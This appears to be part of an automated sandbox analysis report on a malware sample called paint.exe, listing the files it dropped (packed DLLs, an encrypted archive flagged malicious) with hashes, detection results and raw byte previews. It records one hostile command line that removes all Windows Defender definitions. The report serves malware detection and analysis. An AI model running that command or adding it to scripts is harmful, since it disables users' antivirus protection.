                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.
                                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                              Size (bytes):894
                                                                                                                                                                                                                                                              Entropy (8bit):3.11769109741974
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:Q58KRBubdpkoPAGdjrZyL0k9+MlWlLehW51IC4yLt:QOaqdmOFdjrYL3+kWResLIgLt
                                                                                                                                                                                                                                                              MD5:CE6C6BBAB057B06F5776C174968B886A
                                                                                                                                                                                                                                                              SHA1:F9660C147A3A03F12D5909AD3F0D5F4EADB0C38A
                                                                                                                                                                                                                                                              SHA-256:D786494399049C16BCB43457F60DE611D654895DF7BFBB715885D5ED4F4B4B9C
                                                                                                                                                                                                                                                              SHA-512:BBF1F70A4F307EDE89D01DE4325D48A779E5667F0627740698D6A4314BE70F45A82AFC209465A1C5ED568BA090D1E075B62F3FF70607D30757DD36EBE1E14157
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.4.:.1.6.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. J.a.n. .. 0.5. .. 2.0.2.5. .0.4.:.1.6.:.2.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Jan 5 10:41:09 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1372
                                                                                                                                                                                                                                                              Entropy (8bit):4.113327991844016
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:H9Fq9s+fUjE2UDfHzwKefmhNII+ycuZhNMakS4PNnqS+d:dg0E2SkKCmhu1ulMa3AqSe
                                                                                                                                                                                                                                                              MD5:2A7D0C45145D7ECC57244C0BF4F1A60A
                                                                                                                                                                                                                                                              SHA1:5AC93E3F32500709AFA9F15ED4A3CAEF86204F44
                                                                                                                                                                                                                                                              SHA-256:9A8B5431815D4C1C6562ABBD77F4F4DB717EBEB5E59A7C09ED255C699B10B1B9
                                                                                                                                                                                                                                                              SHA-512:E7637463F92529458260301BD4A2AB10D87CE73074EC60E85D9E3A727166477DCB35FD1DB0360DD49AAE7E8AED82A8935D6EE697BF0AEF6133DA9B2707FEA517
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:L....azg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP................M@D.:"...l}5.j...........4.......C:\Users\user\AppData\Local\Temp\RES7663.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe
                                                                                                                                                                                                                                                              File Type:RAR archive data, v5
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):726718
                                                                                                                                                                                                                                                              Entropy (8bit):7.99972638285817
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:3jPmxlfz7REdv2V5jYBeOAijPkN37sMbUF2Tm9wmU5sito1MruPISMFqiY:3jPmxl77R+458BeO5TkNYMbU2K9466oj
                                                                                                                                                                                                                                                              MD5:C0CE07799E5B7B69F59DE6D7362400A7
                                                                                                                                                                                                                                                              SHA1:9D425FC856D2CD880E3E5FBAF6B16B8A471E8A55
                                                                                                                                                                                                                                                              SHA-256:FD8CF022454CD470B564459496DC0E4F44F651B60C01EE1BF92FFF1E773DC882
                                                                                                                                                                                                                                                              SHA-512:4762BCB5A8FAD8075259919A48D5EB3F3B76D772037F0A9A2DAC1AD49B80F536DC9AC606B07C71DDD635C7DC84B2322F99A6A13591F7C29B60310349F2187725
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Preview:Rar!........!.....b..}.....8..6.X...)...+...;..|._ToI....N.B.h.wck(.}.G.l...[..BT.........2b..L...27.. ..}...P.zjP...V.W....F......Yb.C.#t|.)1(.\S..zIw.HB#..Ns.p.........Zh.&ST.2G.!K......G1.T..k.9....g.b..N..>.y....'g..^n.v....<6._..dV.`..".N..u_'A~.-.$^..p.%-........y...-........P".a.}...XQ.1$2.N....?....#..k.>....b.~O..._o....l1O.......wh..O.=.>.m..Q...0..b...2..:kI.....h.... ..ee..Q..w.V([.F..d....l"...:.R.It..J...,...2LW.'.v.....cp../..FY..y..<.j ...........8u..L....aiU.I0l*....8.2....+,$.4...;....U...aO...b..P..6..B ..c...Si..I..t.j.4e....I..8&...U...z-$*CZ3~..g..`..:F.Vq3.4.....eB.x8l/j. ~..8}.w...wJ->.....t..2.z.K)v..&.y?^.b...l|I....?~..Ds.M.z.....m.zP..&............wh......HG.... .........U..,O..V.|.Y|R3.7Od..#x..-:.+).>..,y.z..*Y.e...W..pOG-...&...|}+..f1.n.L.H[..#...<..\.z}.'.....6>x...R..W...8...Ki<.FIqh.....jF.g".^%..e...-.F....@["o.2...Nz.l.r\.bR..].).~u.k0........%.l.E.+...M...g%.&...@.......,..s$'(.p$g.m.`k`...?.....d....t.
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):120400
                                                                                                                                                                                                                                                              Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                                              MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                                              SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                                              SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                                              SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: 3LcZO15oTC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: X9g8L63QGs.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: riFSkYVMKB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: mcgen.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: AimStar.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: DChOtFdp9T.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: user.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: HX Design.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: YgJ5inWPQO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51944
                                                                                                                                                                                                                                                              Entropy (8bit):7.767101046633284
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:ozTAsFl1R2u75vp+qCOLcI+CVYkyUzR9pfI/KYF:oztl1R2uDQXI+CVYfb
                                                                                                                                                                                                                                                              MD5:7727659BB076D34CF0F0AD1C1FC968E6
                                                                                                                                                                                                                                                              SHA1:5D91194BBE6D8CAF5EAFDE938A8D364377B53851
                                                                                                                                                                                                                                                              SHA-256:B9A2152A844FB58FB294DC33EFD3BD2C266DEF470BFE4B4EDACFB75DD2E3ECED
                                                                                                                                                                                                                                                              SHA-512:AB4AD49CFF143A40C408828E18EA095C2733667EA27E8BBFC4CFA05D433D4C0F8DE64B217021B62BCBEF538B0D8912A98F53669AF3D49ACBA01E31DE6FA4A8C2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.....@...@...@.......@...A...@.......@...C...@...D...@...E...@..A...@.a.A...@...A.L.@..M...@..@...@......@..B...@.Rich..@.........PE..d....\Og.........." ...*.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):62696
                                                                                                                                                                                                                                                              Entropy (8bit):7.818501056461699
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:yZ6c3MDFbKb0SYFcRXUP3i9Hi2DMszWI+LPIcyUzR9hkfI/KI6BO:3c3M5bWjU3iF+s6I+LPIeaO
                                                                                                                                                                                                                                                              MD5:9527B566DDA0B94F93F6DEF63BAAC6BB
                                                                                                                                                                                                                                                              SHA1:FEE229EC97AC282C9ABDE88216EF29096B1B4376
                                                                                                                                                                                                                                                              SHA-256:456C82D5B49AF25839A62E933794DFEC3D2AFDEF10D23A81FAD94B53B488FCC0
                                                                                                                                                                                                                                                              SHA-512:D2D1A9D5A4CBDF98B40354366B95E4DFB84A42E6A093E4E402FEF5652CEAAF79A0EB80D47BAD99CCF202BACA365739108110AA2B14A82664B794A3490FE16193
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.Z...4...4...4.......4..~5...4..~7...4..~0...4..~1...4..~5...4.jy0...4.jy5...4..5...4...5...4..~9...4..~4...4..~...4..~6...4.Rich..4.................PE..d....\Og.........." ...*.....................................................P............`.........................................HL.......I.......@.......................L.......................................:..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):111984
                                                                                                                                                                                                                                                              Entropy (8bit):7.921858340581511
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:qMU59D5x2XOeajAzXgjNiJluK0uEw/eJ5clHI+OqOb5DVVh:H29Db02jA0jYJluotmJOybTVh
                                                                                                                                                                                                                                                              MD5:0E2118A943A97B74D428204818210403
                                                                                                                                                                                                                                                              SHA1:ABFE4CAD38A66A6FF448AF946CF7250B8B506A2D
                                                                                                                                                                                                                                                              SHA-256:BA390B3078A848F0254548FCB5BEF8441DBBCB36467F9C6D9D18DACF92A18DED
                                                                                                                                                                                                                                                              SHA-512:E21ABBAAF27CC19D386EA8B23117420D3A94E4380C900BD7528972FC9FC763F271C3313431B4EF9B5C336E9CDF0631C0780C2BAC4B209EA14C9F2E53710C7DE7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|LVT8-8.8-8.8-8.1U..6-8.).9.:-8.).;.<-8.).<.0-8.).=.5-8...9.;-8.J.9.:-8.8-9..-8...;.9-8...5.7-8...8.9-8.....9-8...:.9-8.Rich8-8.................PE..d....\Og.........." ...*.p...................................................0............`..........................................,..P....)....... ...........&...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):37880
                                                                                                                                                                                                                                                              Entropy (8bit):7.650374380736981
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:IbKdUeBIro4srako2pWjnI+OIVgFJyUFRYT2Ip44Cxf1mlzzn:IG9WsrRGjnI+OIVgPyUzR9pfIPn
                                                                                                                                                                                                                                                              MD5:69DA0E0688C8D2B1B6801E63053C3412
                                                                                                                                                                                                                                                              SHA1:85AA9A8A26BF71A923D80690B8C2F9D666A65009
                                                                                                                                                                                                                                                              SHA-256:12332EB2C681511BC99BFF5A9B14D935933585199F10E57C0F37EBDAA6519ECE
                                                                                                                                                                                                                                                              SHA-512:5AF791409CE722B656775660700048D63DD26055280FE465ADC1C53A44071657EF4F036CADB058A65A1E4F57B9DCEBA431A3BD679C65CA3ABE8A80AE004D160F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.&@".H.".H.".H.+...&.H.3.I. .H.3.K.!.H.3.L.*.H.3.M...H...I. .H.P.I. .H.7.I.!.H.".I...H...E.#.H...H.#.H.....#.H...J.#.H.Rich".H.........PE..d....\Og.........." ...*.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):90480
                                                                                                                                                                                                                                                              Entropy (8bit):7.909526190238606
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:J8WbMZcJfOC2nKdLtBF6lT43WtFSf6gphAVM7uqGKs6t/I+Z1jXyUzR9ufI+vvGG:ewMZUfOKdLjFnQFmf4MxGYI+Z1jzxVVm
                                                                                                                                                                                                                                                              MD5:7A4DAD239486B02FF5106141D7ABA3A7
                                                                                                                                                                                                                                                              SHA1:BD0AF849DAC3322B64B5D44956074FA50961AACA
                                                                                                                                                                                                                                                              SHA-256:10856DBFD8C956E24ED04F6D533B8C03A2131A99F3AE427FACD7BEE9AD98802A
                                                                                                                                                                                                                                                              SHA-512:245B5B86A796660983E3FF0297A930F0D64EA4CECF6E6743D3E4B9999C5990C4ECB1600271FFF4E1F0A46CCEBC74E6AEF522585DF50080A86BB104E7797E64AE
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K..............X......3.......3.......3.......3.......3.......4...............3.......3.......34......3......Rich....................PE..d....]Og.........." ...*. ...............................................................`.........................................4...L....................@.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):28152
                                                                                                                                                                                                                                                              Entropy (8bit):7.4376874076747
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:a7dt2poFpBXI+QUVHJyUFRYT2Ip4ACxf1mlD0D8:wdwpgXI+QUVpyUzR9xfIID8
                                                                                                                                                                                                                                                              MD5:051B0B941192073345D52298F0129B1F
                                                                                                                                                                                                                                                              SHA1:348CB2C18E7ECBEFC45168259ADCCAF5287161B2
                                                                                                                                                                                                                                                              SHA-256:04CA88870ADE6C654490268D93360A61965E8CA799F2D52F6C99948B317BDE4D
                                                                                                                                                                                                                                                              SHA-512:EF78E5D9F5054BBDDC97A3A20471CA13E527739C48664F88108FA61B204E1AD98B0DA205175650C26CDE407775458769A359273AFBDC22060502BC018DE3B260
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..\..............K......j.......j.......j.......j.......j......hm..........Q....j.......j.......j'......j......Rich....................PE..d....\Og.........." ...*.0..........0.....................................................`.............................................L.......P............`..............<.......................................0...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):47464
                                                                                                                                                                                                                                                              Entropy (8bit):7.7029514865981605
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:VNDTv9rez/QuT6QgD2liUHE559FbH/0pNTUI+LwoB+JyUFRYT2Ip4NTxf1mlTAwQ:Vhv9rerTPgK0UH659FSTUI+LwoByyUzN
                                                                                                                                                                                                                                                              MD5:301875ACE6D58AB5737871A14C163A74
                                                                                                                                                                                                                                                              SHA1:35D41B27E589F8295A00A2ADB209B8911E07CE3C
                                                                                                                                                                                                                                                              SHA-256:B3895E8D9389DC883EF05898D3E3E49BADC6D5E6A9433EA6CA315E2513AD88AF
                                                                                                                                                                                                                                                              SHA-512:8A22CA71A62FC10B4CC0F17672554ED3FEEDC315EA118329034C9CC1D132E06767679D5E6180ADBB22232AD6D4B42A1152473FDDF9A0E50482F45FDC43DC16E7
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..}t..}t..}}.S}r..}ee.|v..}ee.|w..}ee.||..}ee.|y..}.e.|v..}t..}...}.b.|}..}.e.|u..}.e.|u..}.e?}u..}.e.|u..}Richt..}........................PE..d....\Og.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):61296
                                                                                                                                                                                                                                                              Entropy (8bit):7.834573193988759
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:YdnfbpxydomstdKw0VYtL3tjzyZKI+OQ46yUzR9YfIQskp:Ydf18dhsX0U3ttI+OQ4Mk
                                                                                                                                                                                                                                                              MD5:9BF44FB475F1732DF8C14B323CC5EC58
                                                                                                                                                                                                                                                              SHA1:16B1F1C63D9A59307293E0A8607023DA2616CBD9
                                                                                                                                                                                                                                                              SHA-256:47EB79D84017ED5C4933622166DC0F003A59FF5556998F23385BE4D6C06B165A
                                                                                                                                                                                                                                                              SHA-512:A97A1059930E1DE933B7899A5F115B065F3358376FF85B995FF4158E86C32379ACC01185DFCF076A2337AF3A81AE949F23B029EBC49E31DC24C4B3D8392C9194
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\...=u..=u..=u..E..=u..t..=u....=u..v..=u..q..=u..p..=u...t..=u...t..=u..=t..<u...x..=u...u..=u......=u...w..=u.Rich.=u.........................PE..d....\Og.........." ...*.........p.. ........................................@............`..........................................;..P....9.......0..........D............;...................................... &..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):69488
                                                                                                                                                                                                                                                              Entropy (8bit):7.8539496905928505
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:NW82vuL9jIWDOgata/rVHiyrVI+C7j/1VyUzR9Q3fInSA:NW82vaj+g6DyJI+C7jXt
                                                                                                                                                                                                                                                              MD5:E6B2D8917B8A03E21F0AF257555767A8
                                                                                                                                                                                                                                                              SHA1:A75D24FA95A6CB27A267AE82FA1006E21E85ED77
                                                                                                                                                                                                                                                              SHA-256:2448D2B881511434DC5CFD397369B0F23D43F08446E3BB4772DA3EB6D593EB1F
                                                                                                                                                                                                                                                              SHA-512:94AAB28A1B7AEC86FF4B9E932876519660E2069846EC2EDB6410A4925FBA98CC3F453602E6071741BEABB057A9142C3A68906652C37626B053DEC93596793239
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^H...H...H...A~!.N...Y...J...Y...K...Y...@...Y...E......J...]...L...H.......:...O......J......I....M.I......I...RichH...........PE..d....\Og.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........D............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22112
                                                                                                                                                                                                                                                              Entropy (8bit):4.744270711412692
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
                                                                                                                                                                                                                                                              MD5:E8B9D74BFD1F6D1CC1D99B24F44DA796
                                                                                                                                                                                                                                                              SHA1:A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
                                                                                                                                                                                                                                                              SHA-256:B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
                                                                                                                                                                                                                                                              SHA-512:B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\paint.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                                              Entropy (8bit):4.602255667966723
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
                                                                                                                                                                                                                                                              MD5:CFE0C1DFDE224EA5FED9BD5FF778A6E0
